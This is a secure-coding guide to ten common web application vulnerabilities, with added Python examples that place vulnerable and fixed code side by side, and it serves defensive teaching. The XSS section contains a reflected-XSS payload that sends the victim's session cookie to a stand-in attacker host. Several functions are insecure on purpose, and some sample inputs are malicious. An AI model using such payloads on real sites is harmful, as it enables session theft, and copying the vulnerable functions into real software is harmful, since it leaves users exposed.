Injection flaws, such as SQL, OS command, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's crafted input can trick the interpreter into executing unintended commands or returning data the caller is not authorized to see.
2. Broken Authentication and Session Management
Application functions related to authentication and session management are often implemented incorrectly. When that happens, attackers can compromise passwords, session tokens, and other personal data, or exploit other implementation flaws to take over users' accounts.
3. Cross-Site Scripting (XSS)
XSS flaws occur when an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS lets an attacker execute scripts in the victim's browser, which can hijack the user's session, deface the site, or redirect the user to fake or otherwise malicious websites.
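An added example, not code from the original article, showing why the escaping must match the output context. The `PAYLOAD` string is constructed for the demonstration; the three safe renderers escape for HTML body, HTML attribute, and JavaScript string contexts respectively.

```python
import html
import json

# Constructed reflected-XSS payload: steals the session cookie via a redirect.
PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(name: str) -> str:
    # Untrusted input is written straight into the page: the browser
    # parses the attacker's <script> element as part of the document.
    return f"<h1>Hello {name}</h1>"


def render_safe(name: str) -> str:
    # HTML body context: escape <, >, &, and quotes so the input is text, not markup.
    return f"<h1>Hello {html.escape(name, quote=True)}</h1>"


def render_attribute_safe(value: str) -> str:
    # Attribute context: the attribute must be quoted AND quotes escaped,
    # otherwise '" onfocus="alert(1)' adds an event handler.
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def render_js_safe(value: str) -> str:
    # JavaScript string context: JSON-encode, then escape "<" so that a
    # "</script>" inside the value cannot terminate the script element early.
    encoded = json.dumps(value).replace("<", "\\u003c")
    return f"<script>var user = {encoded};</script>"


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(render_attribute_safe('" onfocus="alert(1)'))
    print(render_js_safe("</script><script>alert(1)</script>"))
```

`html.escape` alone is not enough inside a `<script>` block: `&lt;` is not decoded there, so the JavaScript context needs its own encoding, which is why the last renderer escapes `<` after JSON encoding instead. Escaping is the output-side defense; a Content-Security-Policy header that disallows inline script is the usual second layer.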
4. Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key, for example in a URL or form parameter. Without an access control check or other protection, attackers can manipulate these references to access data they are not authorized to see.
5. Security Misconfiguration
Good security requires a secure configuration to be defined and deployed for the application, its frameworks, the application server, web server, database server, and platform. Default settings are often insecure, so secure settings must be defined, implemented, and maintained. In addition, all of this software must be kept up to date.
6. Sensitive Data Exposure
Many web applications do not properly protect sensitive data such as credit card numbers and authentication credentials. Attackers may steal or modify such weakly protected data to commit credit card fraud, identity theft, or other crimes.
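The credential-storage half of this point, which also covers the password theft mentioned under Broken Authentication above, as an added example that is not part of the original article: an unsalted fast hash (what many breached sites actually stored) beside salted PBKDF2-HMAC-SHA256 with a constant-time check. The iteration count of 600,000 is the current OWASP recommendation for PBKDF2-SHA256; the stored-string format with `$` separators is this example's own convention.

```python
import base64
import hashlib
import hmac
import os


def weak_hash(password: str) -> str:
    """Unsalted MD5: fast to brute-force and identical for identical passwords,
    so one cracked hash exposes every user who chose the same password."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, iterations: int = 600_000) -> str:
    """PBKDF2-HMAC-SHA256 with a fresh random 16-byte salt.
    The parameters are stored next to the digest so they can be raised later."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    )


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt/iterations and compare in constant time."""
    try:
        algo, iterations, salt_b64, digest_b64 = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations))
    except (ValueError, TypeError):
        # Malformed record: treat as a failed login rather than crashing.
        return False
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    # Constructed sample: two users who picked the same password.
    print("weak:", weak_hash("hunter2"), weak_hash("hunter2"))
    a, b = hash_password("hunter2"), hash_password("hunter2")
    print("salted:", a == b)          # False: different salts
    print("verify:", verify_password("hunter2", a), verify_password("hunter3", a))
```

The salt makes the two stored values differ even for identical passwords, which defeats precomputed tables, and the iteration count makes each guess expensive for an attacker who has stolen the database. Data such as card numbers, which must be recovered rather than only verified, needs encryption rather than hashing; this example covers only the credential case.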
7. Missing Function Level Access Control
Most web applications verify function-level access rights before making that functionality visible in the user interface. However, the application must perform the same access control check on the server each time the function is invoked. If requests are not verified, attackers can forge requests and reach privileged functions without authorization.
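Both authorization flaws, the object-level one described under Insecure Direct Object References above and the function-level one described here, share one check pattern, so this single added example covers both; it is not code from the original article. The users, roles, and document store are constructed sample data, and `Forbidden` and `require_role` are this example's own names.

```python
from dataclasses import dataclass
from functools import wraps


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "user" or "admin"


# Constructed sample data: document id -> owner id and contents
DOCUMENTS = {
    101: {"owner": 1, "body": "alice's tax return"},
    102: {"owner": 2, "body": "bob's medical record"},
}


class Forbidden(Exception):
    """Raised when the caller is not allowed to perform the action."""


def get_document_vulnerable(user: User, doc_id: int) -> str:
    # Insecure direct object reference: the id from the URL is looked up as-is,
    # so any logged-in user who changes 101 to 102 reads someone else's record.
    return DOCUMENTS[doc_id]["body"]


def get_document_safe(user: User, doc_id: int) -> str:
    # Object-level check: the record must exist AND belong to the caller.
    # Missing and foreign records get the same answer so ids cannot be enumerated.
    doc = DOCUMENTS.get(doc_id)
    if doc is None or doc["owner"] != user.id:
        raise Forbidden(f"user {user.id} may not read document {doc_id}")
    return doc["body"]


def require_role(role: str):
    """Function-level check enforced on the server, not just by hiding a menu entry."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(user: User, *args, **kwargs):
            if user.role != role:
                raise Forbidden(f"{fn.__name__} requires role {role!r}")
            return fn(user, *args, **kwargs)
        return wrapper
    return decorator


def delete_user_vulnerable(user: User, target_id: int) -> str:
    # The admin UI hides this button from ordinary users, but the handler
    # itself never checks, so a hand-crafted request to it succeeds.
    return f"user {target_id} deleted"


@require_role("admin")
def delete_user_safe(user: User, target_id: int) -> str:
    return f"user {target_id} deleted"


def is_denied(fn, *args) -> bool:
    """Helper: True if the call is rejected with Forbidden."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    alice, bob, root = User(1, "user"), User(2, "user"), User(3, "admin")
    print(get_document_vulnerable(bob, 101))           # bob reads alice's record
    print(is_denied(get_document_safe, bob, 101))      # True
    print(delete_user_vulnerable(bob, 1))              # no check at all
    print(is_denied(delete_user_safe, bob, 1))         # True
    print(delete_user_safe(root, 1))
```

The two checks answer different questions: `get_document_safe` asks whether this caller may touch this object, `require_role` asks whether this caller may call this function at all. An application needs both, and both must run on the server for every request, regardless of what the UI shows.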
8. Cross-Site Request Forgery (CSRF)
A CSRF attack forces a logged-in victim's browser to send a forged HTTP request, including the victim's session cookie and any other credentials the browser attaches automatically, to a vulnerable web application. The application cannot tell the forged request from one the user made deliberately, so it carries out the attacker's action under the victim's identity.
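An added example, not code from the original article, of the synchronizer-token defense: the server issues a token bound to the session that the browser does not send automatically, so a cross-site form post arrives with the cookie but without the token. The request dictionaries, the `SECRET_KEY`, and the transfer handler are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

# Assumption: a server-side secret that never reaches the client.
SECRET_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token tied to the session: HMAC(secret, session_id).
    It is embedded in the application's own forms as a hidden field."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, submitted) -> bool:
    if not isinstance(submitted, str):
        return False
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected, submitted)


def _do_transfer(form: dict) -> tuple:
    return 200, f"transferred {form.get('amount')} to {form.get('to')}"


def handle_transfer_vulnerable(request: dict) -> tuple:
    # Only the cookie is checked. The browser attaches it to any request
    # aimed at this site, including one an attacker's page triggers.
    if request["cookies"].get("session") is None:
        return 401, "not logged in"
    return _do_transfer(request["form"])


def handle_transfer_safe(request: dict) -> tuple:
    session_id = request["cookies"].get("session")
    if session_id is None:
        return 401, "not logged in"
    # The token lives in the form body, not in a cookie, so another origin
    # cannot read it and cannot make the browser send it.
    if not csrf_token_valid(session_id, request["form"].get("csrf_token")):
        return 403, "CSRF token missing or invalid"
    return _do_transfer(request["form"])


if __name__ == "__main__":
    sid = "sess-1234"
    # Constructed requests: the legitimate form includes the token,
    # the forged cross-site POST carries only the auto-attached cookie.
    legit = {"cookies": {"session": sid},
             "form": {"csrf_token": issue_csrf_token(sid), "to": "bob", "amount": "10"}}
    forged = {"cookies": {"session": sid},
              "form": {"to": "attacker", "amount": "1000"}}
    print("vulnerable/forged:", handle_transfer_vulnerable(forged))
    print("safe/forged:", handle_transfer_safe(forged))
    print("safe/legit:", handle_transfer_safe(legit))
```

The vulnerable handler accepts the forged transfer because the cookie alone looks like the user; the safe one rejects it. Marking the session cookie `SameSite=Lax` or `Strict` is a worthwhile second layer, but the token check is what the application controls on its own.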
9. Using Known Vulnerable Components
Components such as libraries, frameworks, and other software modules almost always run with the full privileges of the application. If a component with a known vulnerability is exploited, the attack can lead to serious data loss or complete server takeover.
10. Unvalidated Redirects and Forwards
Web applications frequently redirect and forward users to other pages and websites, often using untrusted data to decide the destination. Without proper validation, attackers can send victims to phishing or malware sites, or use forwards to reach pages they are not authorized to access.
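An added example, not code from the original article, of validating a `next`-style redirect parameter: only same-site relative paths or absolute URLs on an allowlisted host are honoured, everything else falls back to a fixed default. `ALLOWED_HOSTS` and the default target are assumptions for the demonstration.

```python
from urllib.parse import urlparse

# Assumption: hosts this application is willing to send users to.
ALLOWED_HOSTS = {"app.example.com"}


def safe_redirect_target(target, default: str = "/") -> str:
    """Return `target` only if it stays on this site or an allowlisted host."""
    if not target or not isinstance(target, str):
        return default
    # Protocol-relative ("//evil.example") and backslash forms ("/\\evil.example",
    # which some browsers normalise to a host) must be rejected before parsing.
    if target.startswith("//") or "\\" in target:
        return default
    parsed = urlparse(target)
    if parsed.scheme == "" and parsed.netloc == "":
        # Path-only value: require a leading slash so it is relative to this site.
        return target if target.startswith("/") else default
    # Absolute URL: scheme must be http(s) and the *hostname* (not the whole
    # netloc, which an attacker can pad with "user@") must be allowlisted.
    if parsed.scheme in ("http", "https") and parsed.hostname in ALLOWED_HOSTS:
        return target
    return default


if __name__ == "__main__":
    # Constructed inputs an attacker might place in ?next=
    for candidate in ("/account", "//evil.example/phish", "https://evil.example/",
                      "https://app.example.com/settings", "javascript:alert(1)",
                      "https://app.example.com@evil.example/", "/\\evil.example"):
        print(f"{candidate!r:45} -> {safe_redirect_target(candidate)!r}")
```

The check compares `parsed.hostname` rather than `parsed.netloc` because `https://app.example.com@evil.example/` has an allowlisted-looking netloc but actually resolves to `evil.example`. For server-side forwards, the safer design is to map a short name from the request to a fixed path on the server rather than accepting a path at all.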